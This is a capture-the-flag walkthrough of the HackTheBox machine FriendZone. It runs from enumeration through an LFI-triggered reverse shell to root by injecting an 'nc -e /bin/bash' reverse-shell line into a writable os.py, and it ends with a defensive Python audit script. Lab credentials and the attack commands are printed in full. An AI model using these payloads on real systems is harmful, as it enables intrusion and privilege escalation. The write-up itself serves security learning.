HTB FriendZone — Walkthrough

root@ArmourInfosec:/ nmap -sV -p- 10.10.10.123
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Let’s visit port 80 and see what’s going on there.

Got some lines of text, an image and an email address; nothing else in the page source.

Port 443 is also open, which means an HTTPS version of the site, so let’s visit that too.

It shows a 404 Not Found. My thinking is that there is a DNS server here and many domains may be hosted on this single IP, so direct IP access is not served. I took the domain from the email address on the HTTP page, mapped the IP to that domain in my hosts file and tried again.

That got me the page, but I enumerated it completely and found nothing. When I ran a nikto scan I found that the SSL certificate is issued for friendzone.red.

So I changed my hosts file again and visited https://friendzone.red.

From the nmap scan we know that port 53 is open on TCP, which indicates a chance of a zone transfer, so I will try that now.

root@ArmourInfosec:/ dig axfr @10.10.10.123

Got a response but nothing useful: zone transfer is not enabled for the root zone. Let’s change the zone and try again.

root@ArmourInfosec:/ dig axfr friendzoneportal.red @10.10.10.123

And got some domains! Inserted them in the hosts file:

https://administrator1.friendzone.red/    # Login panel
https://uploads.friendzone.red/           # An upload file button
https://hr.friendzone.red/                # Nothing

So we need credentials to log in, which we don’t have. One more port is open that we haven’t enumerated yet, the one for SMB.

For that I will use smbclient and try to list shares with an SMB null login.

root@ArmourInfosec:/ smbclient -L 10.10.10.123

Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
Files           Disk      FriendZone Samba Server Files /etc/Files
general         Disk      FriendZone Samba Server Files
Development     Disk      FriendZone Samba Server Files
IPC$            IPC       IPC Service (FriendZone server (Samba, Ubuntu))

Got some shares. Let’s try to access them and have a look for anything useful. I found the cred.txt file, containing the credentials admin:WORKWORKHhallelujah@#, in the general share.

Log in to the admin panel with these credentials and visit dashboard.php as instructed there.

On enumerating and fuzzing that page I found that the pagename parameter is vulnerable to LFI, so we can access the shell we uploaded via SMB.

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/../../../../../etc/Development/phpreverse

And got a reverse shell. Visited /home/friend and read user.txt.

Then in /var/www/ there is a MySQL config file containing the password of the friend user:

db_user=friend
db_pass=Agpyu12!0.213$

After logging in, I transferred pspy64 and LinEnum to the box. In the pspy64 output there is a script, reporter.py in /opt/server_admin, running as root every 2 minutes. It is not writable, but it imports the os module, and during enumeration I found that we can edit /usr/lib/python2.7/os.py.

I just added one line to os.py:

system("nc 10.10.14.1 443 -e /bin/bash")

Then wait for a while; after some time I get a connection back as the root user on my system.

b0e6c60b82c********ac1656a9e90c7
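The root cause of the final escalation is a standard-library module, os.py, that a low-privileged user can edit while a root cron job imports it. As an added example (not part of the original walkthrough), the following Python audit helper lists .py files on an interpreter's import path that a non-root user could modify; the sample directory it builds is constructed for the test, and the function and file names are my own.

```python
import os
import stat
import sys
import tempfile

# Permission bits that let someone other than the owner modify a file.
_GROUP_OR_WORLD_WRITE = stat.S_IWGRP | stat.S_IWOTH


def find_writable_modules(search_dirs, require_root_owner=True):
    """Return (path, mode, uid) for every regular .py file under search_dirs that a
    non-root user could modify: group/world-writable or, optionally, not owned by root.
    A writable module on the import path of a root-run script is a privilege
    escalation path, which is exactly what the writable os.py on this box provided."""
    findings = []
    for base in search_dirs:
        if not os.path.isdir(base):
            continue
        for root, _dirs, files in os.walk(base):
            for name in files:
                if not name.endswith(".py"):
                    continue
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if not stat.S_ISREG(st.st_mode):
                    continue  # skip symlinks and special files
                perm = stat.S_IMODE(st.st_mode)
                if perm & _GROUP_OR_WORLD_WRITE or (require_root_owner and st.st_uid != 0):
                    findings.append((path, oct(perm), st.st_uid))
    return findings


def build_sample_tree():
    """Constructed sample: a temp 'lib' dir with one safe module and one world-writable os.py."""
    base = tempfile.mkdtemp(prefix="pylib_audit_")
    for name, mode in (("good.py", 0o644), ("os.py", 0o666)):
        path = os.path.join(base, name)
        with open(path, "w") as fh:
            fh.write("# placeholder module\n")
        os.chmod(path, mode)
    return base


if __name__ == "__main__":
    # Audit the running interpreter's own import path.
    for path, mode, uid in find_writable_modules([d for d in sys.path if d]):
        print("WRITABLE %s mode=%s uid=%d" % (path, mode, uid))
```

Run it with the same interpreter the scheduled job uses, or pass that interpreter's sys.path entries explicitly; on this box the path that mattered was /usr/lib/python2.7.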

Security Researcher | OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Vaibhav Joshi

Vaibhav Joshi

Security Researcher | OSCP

More from Medium

Hacker101 Micro-CMS v1 CTF Walkthrough

HackTheBox [FORGE]

[CTF] 1337up CTF writeup- Mirage

Vulnhub: Pwned 1 Walkthrough